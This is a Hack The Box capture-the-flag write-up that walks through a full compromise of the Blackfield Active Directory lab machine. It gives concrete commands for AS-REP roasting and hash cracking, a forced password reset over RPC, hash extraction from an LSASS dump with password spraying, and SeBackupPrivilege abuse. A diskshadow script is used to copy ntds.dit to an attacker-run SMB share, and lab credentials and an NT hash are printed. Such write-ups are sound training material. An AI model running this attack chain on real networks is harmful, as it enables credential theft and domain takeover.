HTB | Blackfield

This is a box on the Hack The Box Active Directory 101 track. Find the box here.

Skills Learned

  • Leveraging Backup Operators group membership

  • Dumping credentials from LSASS

  • Extracting ntds.dit via diskshadow

NMAP

IP: 10.10.10.192

nmap -sT -p- --min-rate 10000 10.10.10.192 -Pn
nmap -sC -sV -p 53,88,135,389,445,593,3268,5985 10.10.10.192 -Pn

LDAP - TCP 389

From the Nmap result we know the domain is BLACKFIELD.local.

ldapsearch -H ldap://10.10.10.192 -x -s base namingcontexts

-x - simple (anonymous) bind
-H ldap://10.10.10.192 - host to query
-s base - set the search scope to base
namingcontexts - return only the namingContexts attribute

This gives the domain, BLACKFIELD.LOCAL:


SMB - TCP 445

CrackMapExec

CrackMapExec gives a hostname, DC01, which is in line with the thinking that this is a domain controller. It also gives the domain, BLACKFIELD.local.

crackmapexec smb 10.10.10.192

Null Connection

With no creds, I can read the profiles$ share:

smbmap -H 10.10.10.192 -u guest -p ""

I can connect, and there are over 300 directories in the share:

smbclient //10.10.10.192/profiles$ -N

Each directory is empty, but the directory names look like usernames.

I'll copy the names to a text file (user.txt) to use as a user list.

HTTP - TCP 5985

Port 5985 is WinRM (WS-Management over HTTP). Browsing to it in a web browser just returns page not found, but it is the port evil-winrm will use later for any account that has remote management rights.

Foothold/shell

Access as support

AS-REP Roast

Just like in Forest and Sauna, I can check this list of users for any that have the UF_DONT_REQUIRE_PREAUTH flag set. For those users, an AS-REQ without pre-authentication returns an AS-REP containing data encrypted with the user's password-derived key, which I can try to crack offline without holding any valid domain credentials.

I'll use the list of users I collected from the profiles$ share and run GetNPUsers.py to look for vulnerable users.

GetNPUsers.py 'BLACKFIELD.LOCAL/' -usersfile user.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.192

It finds a hash for support.

Now I can crack the hash with hashcat (mode 18200 is Kerberos 5 AS-REP etype 23):

hashcat -m 18200 hashes.aspreroast /home/anurag/Downloads/rockyou.txt --force

With these creds, I'll see what kind of access I just acquired. Unfortunately, support does not have WinRM access:

These creds do work for SMB:

crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight'

But only with read access:

smbmap via support

Access as audit2020

Kerberoasting

Now that I have valid domain creds, I tried to Kerberoast, but no accounts with an SPN came back:

GetUserSPNs.py -request -dc-ip 10.10.10.192 'blackfield.local/support:#00^BlackKnight'

Bloodhound

There's a BloodHound ingestor that can be run from Linux, BloodHound.py.

bloodhound-python -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.10.10.192 -c All

-c All - all collection methods
-u support -p #00^BlackKnight - username and password to auth as
-d blackfield.local - domain name
-dc dc01.blackfield.local - DC name (it won't let you use an IP here)
-ns 10.10.10.192 - use 10.10.10.192 as the DNS server

It gives seven JSON files.

Load all of them into BloodHound.

In the top left, I searched for support and checked out the node info.

There was one item listed under “First Degree Object Control”:

When I click the “1”, I can see that support has “ForceChangePassword” on AUDIT2020:

Password Reset over RPC

There's a somewhat famous post by Mubix about resetting Windows passwords over RPC. I'll use the rpcclient command setuserinfo2:

The blog says to use 23 as the level. Level 23 (SAMR UserInternal4Information) sets a new password outright without supplying the old one, which is exactly what ForceChangePassword grants. Note that this is a reset rather than a change: the old password is lost and the user will notice the next time they log in, so on a real engagement record what was changed.

This can also be done as a single command:

rpcclient -U 'blackfield.local/support%#00^BlackKnight' 10.10.10.192 -c 'setuserinfo2 audit2020 23 "test@123"'
rpcclient to reset audit2020 password

Now I can log in as audit2020 over SMB, but still not WinRM:

crackmapexec

Shell as svc_backup

As audit2020, I now have access to a new share that wasn't listed before, forensic:

Connecting to forensic, there are three folders:

This appears to be the results of an investigation. commands_output has a bunch of text files:

There’s an extra account, Ipwn3dYourCompany, in domain_admins.txt:

memory_analysis holds a lot of zip files.

Extract Hashes

Immediately I'm drawn to lsass.zip. Mimikatz first came to prominence because it would dump plaintext credentials and hashes from lsass.exe. As anti-virus started catching on to that, attackers pivoted. A well-known technique is to use procdump.exe from Sysinternals to dump lsass.exe, exfiltrate the memory dump, and extract the hashes from it in attacker-controlled space.

Downloading the file with smbclient failed with NT_STATUS_IO_TIMEOUT, so I tried Impacket's smbclient.py instead:

smbclient.py audit2020:'test@123'@10.10.10.192

Unzipping lsass.zip gives a 137MB minidump, the memory of the process at the time of capture:

I can run pypykatz on the extracted lsass.DMP to retrieve NT hashes.

pip3 install pypykatz 
pypykatz lsa minidump lsass.DMP

There are some interesting sessions: two for svc_backup and one for Administrator.

Before spraying these credentials against the server, let's check the account lockout policy.

ldapsearch -H ldap://10.10.10.192 -x -b "DC=BLACKFIELD,DC=local" -D 'BLACKFIELD\support' -w '#00^BlackKnight' -s sub "(objectClass=*)" lockoutThreshold | grep lockoutThreshold

The password policy has a lockoutThreshold of 0, which means an unlimited number of attempts without locking the account out (although this is quite noisy). I can extract all usernames and hashes from the lsass dump, save them as hashes and users respectively, and spray with CrackMapExec to discover a working combination. Note that sorting the two lists independently loses the pairing between each user and its hash, so CrackMapExec ends up trying every user against every hash; with a lockoutThreshold of 0 that is safe here, but against a domain that does lock out you would want to keep each username with its own hash.

pypykatz lsa minidump lsass.DMP | grep 'NT:' | awk '{ print $2 }' | sort -u > hashes 
pypykatz lsa minidump lsass.DMP | grep 'Username:' | awk '{ print $2 }' | sort -u > users

For some reason I couldn't get CrackMapExec to accept both the users and hashes files, so I'll pass the username on the command line and the hashes file with -H instead.

This finds the hash for svc_backup.

Trying WinRM with it gives Pwn3d!

I'm in via evil-winrm and can read user.txt:

evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

Priv Esc

If the account name didn’t give it away, checking whoami /priv shows that this account has a really powerful privilege:

whoami /priv

SeBackupPrivilege lets a process open any file for reading with backup semantics, bypassing the file's ACL, which amounts to a full read of the filesystem. svc_backup has it because it is in the Backup Operators group:

net user svc_backup

Backup Operators is a default Windows group designed to back up and restore files on the computer, which requires reading (and on restore, writing) all or most files on the system regardless of their permissions. This repo has a nice set of PowerShell tools for abusing SeBackupPrivilege. I'll clone it, and then I'll need to upload two files to Blackfield:

Now I’ll import them into my current session:

Now I can read files across the filesystem. For example, I can't read C:\windows\system32\config\netlogon.dns as a non-admin user:

But I can copy it with the backup cmdlet and then read the copy:

Unfortunately, for some reason, I can’t read root.txt:

The next file I wanted to grab was ntds.dit, the database on the DC that holds every account's password hashes. I can't copy it directly because LSASS holds it open while the DC is running:

DiskShadow

A good way to get at ntds.dit is another Microsoft utility, diskshadow. Diskshadow.exe exposes the functionality of the Volume Shadow Copy Service (VSS). By default it runs an interactive command interpreter similar to diskraid or diskpart, but it also has a scriptable mode. Because my shell is not an interactive desktop, I'll use the scripting mode: the diskshadow commands go in a file, one per line. The Pentestlab blog has a good breakdown that includes a section on diskshadow. It's written as if you already have admin and just need to deal with the file being in use, so my strategy is slightly different: I'll create a script that snapshots the C: volume with VSS and exposes the snapshot as another drive letter. Files that are locked on C: can be read from the snapshot.

It took me a few attempts to get this to actually work. Refer to the script from the PentestLab blog.

In summary, to get this script working, I needed to:

  • Make sure the input script file uses Windows line endings. If I write the script file on Kali, I'll need to run unix2dos on it before uploading.

  • Set the metadata path to something writable (or run from a directory I can write to).

  • Some quick testing shows it's fine to run from outside system32, despite what the blog post says.

The working script:

set context persistent nowriters
set metadata c:\programdata\at.cab
set verbose on
add volume c: alias at
create
expose %at% z:

Script to clean up after we are done:

set context persistent nowriters
set metadata c:\programdata\at.cab
set verbose on
delete shadows volume at
reset

I'll upload that and run it. The article recommends running from C:\windows\system32:

Grab ntds.dit

I'll start an SMB server on my host so that I can copy ntds.dit straight to it:

smbserver.py share . -smb2support -username anurag -password anurag

Now I can authenticate to the share:

After running the script to expose the shadow copy, I'll copy ntds.dit from the exposed drive to the share:

It takes a minute, but it succeeds.

To get hashes out of ntds.dit, I'll also need the boot key from the SYSTEM registry hive. I'll save it with reg:

Dump Hashes

Now I can use these two files to dump hashes for the whole domain with secretsdump.py:

With the Administrator hash I can use evil-winrm to get a shell and read root.txt.